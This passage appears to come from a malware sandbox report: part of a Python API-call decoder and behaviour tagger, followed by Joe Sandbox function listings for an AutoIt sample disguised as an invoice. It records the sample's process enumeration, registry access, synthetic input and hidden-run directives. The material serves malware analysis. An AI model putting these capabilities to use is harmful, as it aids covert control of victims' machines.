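    tags = []
    names = {c.api for c in calls}
    keys_posted = {VIRTUAL_KEYS[c.args[2]] for c in calls
                   if c.api in MESSAGE_APIS and len(c.args) >= 3
                   and c.args[1] in (0x0100, 0x0101) and c.args[2] in VIRTUAL_KEYS}
    # Reading the keyboard state, then posting key events for Shift/Ctrl/Alt/Win:
    # synthetic modifier handling rather than user input.
    if {"GetKeyboardState", "SetKeyboardState"} <= names and keys_posted:
        tags.append("synthetic-modifier-keys:" + ",".join(sorted(keys_posted)))
    if names & {"RegDeleteKeyW", "RegDeleteKeyA"}:
        tags.append("registry-key-delete")
    return tags


if __name__ == "__main__":
    parsed = parse_apis(SAMPLE_APIS)
    for c in parsed:
        print(f"{c.ref:08X}  {decode(c)}")
    print("tags:", tag_block(parsed))
```

                                                               Running the block on the constructed sample renders the four PostMessageW lines as WM_KEYUP for VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN, which is what the hex arguments 00000101 / 00000010..0000005B encode; the same decoder applied to the sibling block with message 00000100 yields the matching WM_KEYDOWN sequence. Hex values the tables do not cover (for instance 000000EB in GetWindowLongW) are left as numbers rather than guessed.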
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00258FE7
                                                              • GetWindowLongW.USER32(00C0A1D0,000000F0), ref: 0025901A
                                                              • GetWindowLongW.USER32(00C0A1D0,000000F0), ref: 0025904F
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00259081
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002590AB
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 002590BC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002590D6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: 0af8f0ae36845445c5509adeafe42874b49648d16fa7243aaf8471805f5349ad
                                                              • Instruction ID: d952f3379d64ce1c847fc2b55284e5b91589ade5229b5935ba65b379967ca1e3
                                                              • Opcode Fuzzy Hash: 0af8f0ae36845445c5509adeafe42874b49648d16fa7243aaf8471805f5349ad
                                                              • Instruction Fuzzy Hash: DB312834610216DFDB208F58EC88F6437B9FB4A765F140264FA198B2F1CB71A8A4DB45
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002308F2
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00230918
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0023091B
                                                              • SysAllocString.OLEAUT32(?), ref: 00230939
                                                              • SysFreeString.OLEAUT32(?), ref: 00230942
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00230967
                                                              • SysAllocString.OLEAUT32(?), ref: 00230975
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 46ad67cd2e4f77e302514ff5a271b9af45f92387c4c03e7238de84a41ee84b94
                                                              • Instruction ID: 5e8907e6b726457426aadedb1d6da20c801c86f38dd69351256e492c8f8d4b0a
                                                              • Opcode Fuzzy Hash: 46ad67cd2e4f77e302514ff5a271b9af45f92387c4c03e7238de84a41ee84b94
                                                              • Instruction Fuzzy Hash: 0521B2B2610209AFEB109FA8DC98EAB73BCEF08760B408525F909DB151D670EC418B60
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                              • API String ID: 1038674560-2734436370
                                                              • Opcode ID: 348c24e2e25c4726ee6bf25569298ef9b1f19f5ded5926e8c5691a3b97c617ff
                                                              • Instruction ID: 06121bfc3e623847c47bae42c79d103f7faab91a358d545c7c823754f827b05e
                                                              • Opcode Fuzzy Hash: 348c24e2e25c4726ee6bf25569298ef9b1f19f5ded5926e8c5691a3b97c617ff
                                                              • Instruction Fuzzy Hash: E9216DB2230212A7D724AA349C12EB773A8EF65300F904025F545A70C2E6A19ABAC794
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002309CB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002309F1
                                                              • SysAllocString.OLEAUT32(00000000), ref: 002309F4
                                                              • SysAllocString.OLEAUT32 ref: 00230A15
                                                              • SysFreeString.OLEAUT32 ref: 00230A1E
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00230A38
                                                              • SysAllocString.OLEAUT32(?), ref: 00230A46
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: ca5da3f5f0d1a3dcc99c927b0739bf3b59d2f512947e8fbe2189346084abe48b
                                                              • Instruction ID: 4e9e3938e87c30bebdc8065ffe984e2526100b77934db34e0498b3877c6b7c84
                                                              • Opcode Fuzzy Hash: ca5da3f5f0d1a3dcc99c927b0739bf3b59d2f512947e8fbe2189346084abe48b
                                                              • Instruction Fuzzy Hash: D8215875610205AFDB10DFA8ECD9D6B77ECEF08360B448125FA09CB2A1D674EC918B64
                                                              APIs
                                                                • Part of subcall function 0020D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0020D1BA
                                                                • Part of subcall function 0020D17C: GetStockObject.GDI32(00000011), ref: 0020D1CE
                                                                • Part of subcall function 0020D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0020D1D8
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0025A32D
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0025A33A
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0025A345
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0025A354
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0025A360
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: 979578116868e0d299a6c23c059eff34d52c9a9654c71c07e140d3a0957e8c20
                                                              • Instruction ID: 45c2043ba0e6d47afa087374366acd0990000c74d150092d90ac813b97ee355a
                                                              • Opcode Fuzzy Hash: 979578116868e0d299a6c23c059eff34d52c9a9654c71c07e140d3a0957e8c20
                                                              • Instruction Fuzzy Hash: 9311D3B1110219BEEF105F60CC86EE77F6DFF09398F014214BA08A20A0C6729C21DBA4
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 0020CCF6
                                                              • GetWindowRect.USER32(?,?), ref: 0020CD37
                                                              • ScreenToClient.USER32(?,?), ref: 0020CD5F
                                                              • GetClientRect.USER32(?,?), ref: 0020CE8C
                                                              • GetWindowRect.USER32(?,?), ref: 0020CEA5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Rect$Client$Window$Screen
                                                              • String ID:
                                                              • API String ID: 1296646539-0
                                                              • Opcode ID: c775588eb7387fb403b04c0e2fd12914800bef092c0d2fc1de83b06b3c9fae44
                                                              • Instruction ID: 53dde4334a6114064250935e796ab585ea66cd3d84bad8e2b9f2a2b8d3424750
                                                              • Opcode Fuzzy Hash: c775588eb7387fb403b04c0e2fd12914800bef092c0d2fc1de83b06b3c9fae44
                                                              • Instruction Fuzzy Hash: CAB15CB992024ADBDF10CFA8C4847EDB7B1FF08310F248669EC59EB251DB70A960DB54
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00251C18
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00251C26
                                                              • __wsplitpath.LIBCMT ref: 00251C54
                                                                • Part of subcall function 00211DFC: __wsplitpath_helper.LIBCMT ref: 00211E3C
                                                              • _wcscat.LIBCMT ref: 00251C69
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00251CDF
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00251CF1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                              • String ID:
                                                              • API String ID: 1380811348-0
                                                              • Opcode ID: fa5339a1fc0314f51520fa05bb4f92881346306c1669e8f3e5581137b6068a58
                                                              • Instruction ID: 7a3bd23808998d55247fc229a48078b08e629623a244f3063f885de0139468bf
                                                              • Opcode Fuzzy Hash: fa5339a1fc0314f51520fa05bb4f92881346306c1669e8f3e5581137b6068a58
                                                              • Instruction Fuzzy Hash: 90517E711143049FD720EF24D885EABB7E8EF88754F00491EF98A97292EB70D958CB92
                                                              APIs
                                                                • Part of subcall function 00253C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00252BB5,?,?), ref: 00253C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002530AF
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002530EF
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00253112
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0025313B
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0025317E
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0025318B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                              • String ID:
                                                              • API String ID: 3451389628-0
                                                              • Opcode ID: ade28fc10695a7f497a9389d76e2dc40b2ef8aec3f52db39fa01179058f900c3
                                                              • Instruction ID: b4241d41dd595ed658c0a50ee4b957bc0d03e325db43fb233d90f4386bc2887c
                                                              • Opcode Fuzzy Hash: ade28fc10695a7f497a9389d76e2dc40b2ef8aec3f52db39fa01179058f900c3
                                                              • Instruction Fuzzy Hash: 5B515A31214304AFC700EF64C885E6ABBF9FF88354F04891DFA55972A1DB71EA19CB92
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 00258540
                                                              • GetMenuItemCount.USER32(00000000), ref: 00258577
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0025859F
                                                              • GetMenuItemID.USER32(?,?), ref: 0025860E
                                                              • GetSubMenu.USER32(?,?), ref: 0025861C
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0025866D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              • API String ID: 650687236-0
                                                              • Opcode ID: d664ed3551d68688a55dc20a8e69b37241fca581b10d4a0f016ee249e1678f3d
                                                              • Instruction ID: f1573c4427ce28d3b43f5d10dc6d16bc2306c6821e7065e34cf9b958ace01692
                                                              • Opcode Fuzzy Hash: d664ed3551d68688a55dc20a8e69b37241fca581b10d4a0f016ee249e1678f3d
                                                              • Instruction Fuzzy Hash: 2B519C71A10219AFCB11EF64C845AAEB7F8EF48310F114459ED05BB351DBB0AE558F94
                                                              APIs
                                                              • _memset.LIBCMT ref: 00234B10
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00234B5B
                                                              • IsMenu.USER32(00000000), ref: 00234B7B
                                                              • CreatePopupMenu.USER32 ref: 00234BAF
                                                              • GetMenuItemCount.USER32(000000FF), ref: 00234C0D
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00234C3E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                              • String ID:
                                                              • API String ID: 3311875123-0
                                                              • Opcode ID: 623d8b345f26fa97c965e66df3dfb362755e9ccb13ca50a9dca59a8966119d2e
                                                              • Instruction ID: 55c729307005a836476e0bad5f25b6ea8e1d770ea6dfd512e1eba71ba9a85f4a
                                                              • Opcode Fuzzy Hash: 623d8b345f26fa97c965e66df3dfb362755e9ccb13ca50a9dca59a8966119d2e
                                                              • Instruction Fuzzy Hash: C251E3F0A2130ADFCF20EF64D888BADBBF5AF44318F14459AE4559B291D3B0E964CB51
                                                              APIs
                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0028DC00), ref: 00248E7C
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00248E89
                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00248EAD
                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00248EC5
                                                              • _strlen.LIBCMT ref: 00248EF7
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00248F6A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_strlenselect
                                                              • String ID:
                                                              • API String ID: 2217125717-0
                                                              • Opcode ID: 2dc3e2ad2f01f17b3366be9414a3bbac3f75565f5c9a986439a9bd83e86be423
                                                              • Instruction ID: f00ce0f2174dc78260a112c2df566279b4d29681c1c274203e1de981c02ddb6d
                                                              • Opcode Fuzzy Hash: 2dc3e2ad2f01f17b3366be9414a3bbac3f75565f5c9a986439a9bd83e86be423
                                                              • Instruction Fuzzy Hash: 2A41E571620108AFCB18EFA4DD86EAEB7B9EF18310F104659F51A972D1DF70AE54CB60
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • BeginPaint.USER32(?,?,?), ref: 0020AC2A
                                                              • GetWindowRect.USER32(?,?), ref: 0020AC8E
                                                              • ScreenToClient.USER32(?,?), ref: 0020ACAB
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0020ACBC
                                                              • EndPaint.USER32(?,?,?,?,?), ref: 0020AD06
                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0026E673
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                              • String ID:
                                                              • API String ID: 2592858361-0
                                                              • Opcode ID: 4cbfd155e4aa8d73523ece94e094011834b4e3c38fdf3f75dcd63ae362a5cc20
                                                              • Instruction ID: 0db6667e3dea717195874b70cfc3e5282cedef092c2206282f56954f749055bd
                                                              • Opcode Fuzzy Hash: 4cbfd155e4aa8d73523ece94e094011834b4e3c38fdf3f75dcd63ae362a5cc20
                                                              • Instruction Fuzzy Hash: 3B41B0711103019FD710DF24EC88FB67BBCEF59320F140269F9A8862E2C371A8A4DB62
                                                              APIs
                                                              • ShowWindow.USER32(002B1628,00000000,002B1628,00000000,00000000,002B1628,?,0026DC5D,00000000,?,00000000,00000000,00000000,?,0026DAD1,00000004), ref: 0025E40B
                                                              • EnableWindow.USER32(00000000,00000000), ref: 0025E42F
                                                              • ShowWindow.USER32(002B1628,00000000), ref: 0025E48F
                                                              • ShowWindow.USER32(00000000,00000004), ref: 0025E4A1
                                                              • EnableWindow.USER32(00000000,00000001), ref: 0025E4C5
                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0025E4E8
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 9fceb02c16a4326626c69af85b78a073b0a8a766e36384bfda4f2d63d1373834
                                                              • Instruction ID: 571ebd27bff766ab89ab263f49dc2ecc7935b48023adc3cba20721ffcf4f204f
                                                              • Opcode Fuzzy Hash: 9fceb02c16a4326626c69af85b78a073b0a8a766e36384bfda4f2d63d1373834
                                                              • Instruction Fuzzy Hash: 04418E30610142EFDF29CF24D489B947BE1BF09306F1941B9EE5C8F1A2C731A999CB64
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 002398D1
                                                                • Part of subcall function 0020F4EA: std::exception::exception.LIBCMT ref: 0020F51E
                                                                • Part of subcall function 0020F4EA: __CxxThrowException@8.LIBCMT ref: 0020F533
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00239908
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00239924
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0023999E
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002399B3
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 002399D2
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 2537439066-0
                                                              • Opcode ID: afa51494e53912b6e895f9f7f779490b648f728facdd1d51ca4a3f786d81ca35
                                                              • Instruction ID: 1c77b46de69105119fa7d632260f7747e74f40160210283a5083bced35942d49
                                                              • Opcode Fuzzy Hash: afa51494e53912b6e895f9f7f779490b648f728facdd1d51ca4a3f786d81ca35
                                                              • Instruction Fuzzy Hash: E431A371900205EBDB10EF94DD89E6FB778FF45310F1440A9F909AB286D770DA64CB60
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,002477F4,?,?,00000000,00000001), ref: 00249B53
                                                                • Part of subcall function 00246544: GetWindowRect.USER32(?,?), ref: 00246557
                                                              • GetDesktopWindow.USER32 ref: 00249B7D
                                                              • GetWindowRect.USER32(00000000), ref: 00249B84
                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00249BB6
                                                                • Part of subcall function 00237A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00237AD0
                                                              • GetCursorPos.USER32(?), ref: 00249BE2
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00249C44
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                              • String ID:
                                                              • API String ID: 4137160315-0
                                                              • Opcode ID: d3b89df94cbe1a54338441d6db46106418a1bf4b09e7ea7260cd4931fb4570bf
                                                              • Instruction ID: 2cf3fbde2099a63c12f2fb662a10d49b6349d3528724e92c5f8e64eb518aab97
                                                              • Opcode Fuzzy Hash: d3b89df94cbe1a54338441d6db46106418a1bf4b09e7ea7260cd4931fb4570bf
                                                              • Instruction Fuzzy Hash: 2831C1B210430AABC724DF18E849F9BB7E9FF89314F00091AF589E7181D671E954CB92
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0022AFAE
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0022AFB5
                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0022AFC4
                                                              • CloseHandle.KERNEL32(00000004), ref: 0022AFCF
                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0022AFFE
                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 0022B012
                                                              Similarity
                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                              • String ID:
                                                              • API String ID: 1413079979-0
                                                              • Opcode ID: d4ad462df47961e18ce4b9a96488464c0e95852d6a3b0a64cfc26b157060af13
                                                              • Instruction ID: 2a882837a9b117dd2df90b8a9ea50319d7c0feb780ade51c472b3a41692303a9
                                                              • Opcode Fuzzy Hash: d4ad462df47961e18ce4b9a96488464c0e95852d6a3b0a64cfc26b157060af13
                                                              • Instruction Fuzzy Hash: 1E21797251021ABFDB128FE4EE09FEE7BA9BF44304F044015FA05A2561D37A9D60EB61
                                                              APIs
                                                                • Part of subcall function 0020AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0020AFE3
                                                                • Part of subcall function 0020AF83: SelectObject.GDI32(?,00000000), ref: 0020AFF2
                                                                • Part of subcall function 0020AF83: BeginPath.GDI32(?), ref: 0020B009
                                                                • Part of subcall function 0020AF83: SelectObject.GDI32(?,00000000), ref: 0020B033
                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0025EC20
                                                              • LineTo.GDI32(00000000,00000003,?), ref: 0025EC34
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0025EC42
                                                              • LineTo.GDI32(00000000,00000000,?), ref: 0025EC52
                                                              • EndPath.GDI32(00000000), ref: 0025EC62
                                                              • StrokePath.GDI32(00000000), ref: 0025EC72
                                                              Similarity
                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                              • String ID:
                                                              • API String ID: 43455801-0
                                                              • Opcode ID: 0f10a1aa17239a29f269945ab8a4cf11141b06a0423cd38e96751df2e5d45dda
                                                              • Instruction ID: e1f4a8f3c5d13b6954e0f765f6a73493f69618f012afc165f3e34db3cc6381b6
                                                              • Opcode Fuzzy Hash: 0f10a1aa17239a29f269945ab8a4cf11141b06a0423cd38e96751df2e5d45dda
                                                              • Instruction Fuzzy Hash: 60110972000149BFEF029FA0EC88EEA7F6DEF08351F048112BE0889160D7719EA5DBA0
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0022E1C0
